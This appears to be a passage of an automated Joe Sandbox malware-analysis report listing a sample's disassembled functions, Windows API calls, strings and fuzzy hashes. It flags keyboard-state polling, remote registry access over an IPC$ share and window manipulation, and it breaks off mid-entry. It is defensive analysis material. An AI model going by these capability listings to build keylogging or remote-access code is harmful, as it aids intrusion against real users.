                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                                                                                                                                                    • String ID: BUTTON
                                                                                                                                                                                                                                                                                                    • API String ID: 1194449130-3405671355
                                                                                                                                                                                                                                                                                                    • Opcode ID: a3c09f0b535166f38780177a499c37729827f2ddaf329bb900ebee71c02b27a9
                                                                                                                                                                                                                                                                                                    • Instruction ID: 7a0f6f5e796e54972797f90290f2a2aee71f66cbf5ba3e9b06661235a12d748e
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a3c09f0b535166f38780177a499c37729827f2ddaf329bb900ebee71c02b27a9
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB218072640246BFEB11EFB0ECC9A667B69F74A745B00C025F54A8A7B2EB714D038B11
                                                                                                                                                                                                                                                                                                    Function 00A7F313 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1B329: _wcslen.LIBCMT ref: 00A1B333
                                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00A7F374
                                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00A7F38A
                                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A7F39B
                                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00A7F3AD
                                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00A7F3BE
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: SendString$_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                                                                                                                                                    • API String ID: 2420728520-1007645807
                                                                                                                                                                                                                                                                                                    • Opcode ID: b76ab64e0ee769fb2389451e9f74f76812b9e33a8cd20516a28d0899ddabc157
                                                                                                                                                                                                                                                                                                    • Instruction ID: 4cd2d470d710f2fad8ed84ab78e1ec21379f6515e0940b3e58cb7a94745aa41d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b76ab64e0ee769fb2389451e9f74f76812b9e33a8cd20516a28d0899ddabc157
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 18110632A942297DD724A3A1DC1AEFF7B7CFBD2B00F00482B7412E60D0EAA01E45C5B0
                                                                                                                                                                                                                                                                                                    Function 00A7A958 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetKeyboardState.USER32(?), ref: 00A7A9D9
                                                                                                                                                                                                                                                                                                    • SetKeyboardState.USER32(?), ref: 00A7AA44
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00A7AA64
                                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(000000A0), ref: 00A7AA7B
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00A7AAAA
                                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(000000A1), ref: 00A7AABB
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00A7AAE7
                                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(00000011), ref: 00A7AAF5
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00A7AB1E
                                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(00000012), ref: 00A7AB2C
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00A7AB55
                                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(0000005B), ref: 00A7AB63
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 541375521-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: b2d192379ee6a2f8c2d6fd52e408653a0a968c9eae77852c1d3c431457010fb1
                                                                                                                                                                                                                                                                                                    • Instruction ID: 49ecd9e6aec2aabba1b3c27eb11763211e2a229648eebdafa5fca1e6c38f06d9
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b2d192379ee6a2f8c2d6fd52e408653a0a968c9eae77852c1d3c431457010fb1
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0251E660A0478539FB35D7A08D50BEEBFB59FA2380F08C599C5CA5A1C2DA649F4CC763
                                                                                                                                                                                                                                                                                                    Function 00A7662D Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00A76649
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00A76662
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00A766C0
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00A766D0
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00A766E2
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00A76736
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00A76744
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00A76756
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00A76798
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00A767AB
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00A767C1
                                                                                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00A767CE
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3096461208-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 6ac65d3bd5827b24added11f4cf34a2de00cd8f7d0939a57f591ee1a53460d25
                                                                                                                                                                                                                                                                                                    • Instruction ID: 40e47de98bbfe9c6cffbb02a4bd7df8da48d5dbafc965d9652ed0d3fb80ae50b
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ac65d3bd5827b24added11f4cf34a2de00cd8f7d0939a57f591ee1a53460d25
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 35512F71A00616AFDF18CFA8CD85BAEBBB5FB48314F148129F51AE7690D770AD058B50
                                                                                                                                                                                                                                                                                                    Function 00A1146D Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A11802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A11488,?,00000000,?,?,?,?,00A1145A,00000000,?), ref: 00A11865
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00A11521
                                                                                                                                                                                                                                                                                                    • KillTimer.USER32(00000000,?,?,?,?,00A1145A,00000000,?), ref: 00A115BB
                                                                                                                                                                                                                                                                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 00A529B4
                                                                                                                                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00A1145A,00000000,?), ref: 00A529E2
                                                                                                                                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00A1145A,00000000,?), ref: 00A529F9
                                                                                                                                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00A1145A,00000000), ref: 00A52A15
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00A52A27
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 641708696-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 405bbf14be108aa0f114194c3798a9ffa7114c3e7fb022511189074534046fcf
                                                                                                                                                                                                                                                                                                    • Instruction ID: 4cd4ef05aef53c6da96268b05cd9741cd4e05c15a5d82e39620a433c027f5ffb
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 405bbf14be108aa0f114194c3798a9ffa7114c3e7fb022511189074534046fcf
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B1617C31501752DFDB39DF54D988BAA77B6FB81322F109118E6835AAB1C770AC86DB80
                                                                                                                                                                                                                                                                                                    Function 00A12128 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A12234: GetWindowLongW.USER32(?,000000EB), ref: 00A12242
                                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00A12152
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ColorLongWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 259745315-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 6cd799da0c429bae0f6f92f1ea123c7127f5d473ec8ba67c0a8c3b338fd41f05
                                                                                                                                                                                                                                                                                                    • Instruction ID: fb0beaeeb8619aa300a4fe98acbf1ef4fb1d8b80ca7aa12dd718aa79777870ab
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6cd799da0c429bae0f6f92f1ea123c7127f5d473ec8ba67c0a8c3b338fd41f05
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D41BD31240641BFDB24DF689C88BFA3B75AB42361F144359FAA68B2E1C731CD92DB10
                                                                                                                                                                                                                                                                                                    Function 00A7A05C Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00A60D31,00000001,0000138C,00000001,00000000,00000001,?,00A8EEAE,00AE2430), ref: 00A7A091
                                                                                                                                                                                                                                                                                                    • LoadStringW.USER32(00000000,?,00A60D31,00000001), ref: 00A7A09A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1B329: _wcslen.LIBCMT ref: 00A1B333
                                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00A60D31,00000001,0000138C,00000001,00000000,00000001,?,00A8EEAE,00AE2430,?), ref: 00A7A0BC
                                                                                                                                                                                                                                                                                                    • LoadStringW.USER32(00000000,?,00A60D31,00000001), ref: 00A7A0BF
                                                                                                                                                                                                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00A7A1E0
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                                                                                                                                    • API String ID: 747408836-2268648507
                                                                                                                                                                                                                                                                                                    • Opcode ID: 4cc35b06de9abb95cf057bc95028ef50b6935b3d61007cf241a66246976e4787
                                                                                                                                                                                                                                                                                                    • Instruction ID: 5cac49f739f4fb30836acef5689ffd6e659473ec1956f1c3eded2c7ed08bfd1f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4cc35b06de9abb95cf057bc95028ef50b6935b3d61007cf241a66246976e4787
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE415172804219BACF05FBE0DE86DEEB778AF58300F504565F506B6092EB356F89CB61
                                                                                                                                                                                                                                                                                                    Function 00A70FCF Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A18577: _wcslen.LIBCMT ref: 00A1858A
                                                                                                                                                                                                                                                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00A71093
                                                                                                                                                                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00A710AF
                                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00A710CB
                                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00A710F5
                                                                                                                                                                                                                                                                                                    • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00A7111D
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00A71128
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00A7112D
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                                                                                                                    • API String ID: 323675364-22481851
                                                                                                                                                                                                                                                                                                    • Opcode ID: 4fb9778a62eb4c3443e5035519625527c7ead21171bce0f59371980eda11955f
                                                                                                                                                                                                                                                                                                    • Instruction ID: 2ca9ca8cf91903a215e23d75791eb260ed48b8b0810c36e97ed3b445122fb2b0
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4fb9778a62eb4c3443e5035519625527c7ead21171bce0f59371980eda11955f
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C2410A72C10129ABCF11EBA4DC95DEEB7B8FF04750F408129E946A31A0EB319E45CB60
                                                                                                                                                                                                                                                                                                    Function 00AA4A34 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00AA4AD9
                                                                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00AA4AE0
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00AA4AF3
                                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00AA4AFB
                                                                                                                                                                                                                                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00AA4B06
                                                                                                                                                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 00AA4B10
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00AA4B1A
                                                                                                                                                                                                                                                                                                    • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00AA4B30
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00AA4B3C
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                                                                                                                                                    • String ID: static
                                                                                                                                                                                                                                                                                                    • API String ID: 2559357485-2160076837
                                                                                                                                                                                                                                                                                                    • Opcode ID: 282f2e0cb4176d31e465a6bccb63cb2d85641d9f55efd81e6ef14d11e1b7b39e
                                                                                                                                                                                                                                                                                                    • Instruction ID: b0d679c39c8a3c71fb19d1c8b6460137a59f12a6fe9f8fc43ad74a47a91d21de
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 282f2e0cb4176d31e465a6bccb63cb2d85641d9f55efd81e6ef14d11e1b7b39e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 07316A7210021ABBDF129FA4DC08FDA3BA9FF4E364F110211FA56A61E0C775D861DBA4
                                                                                                                                                                                                                                                                                                    Function 00A9468D Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00A946B9
                                                                                                                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00A946E7
                                                                                                                                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00A946F1
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A9478A
                                                                                                                                                                                                                                                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00A9480E
                                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00A94932
                                                                                                                                                                                                                                                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00A9496B
                                                                                                                                                                                                                                                                                                    • CoGetObject.OLE32(?,00000000,00AB0B64,?), ref: 00A9498A
                                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 00A9499D
                                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00A94A21
                                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00A94A35
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 429561992-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 5d8caab77ad3cd9337af31e3ca2c8636e967f00d4436f0ae779fda88a80bdb38
                                                                                                                                                                                                                                                                                                    • Instruction ID: 54f6a2e1db7d07d017b51160b8f5fc4fa355d6d4c23ab30fa9a0ce036f02d79c
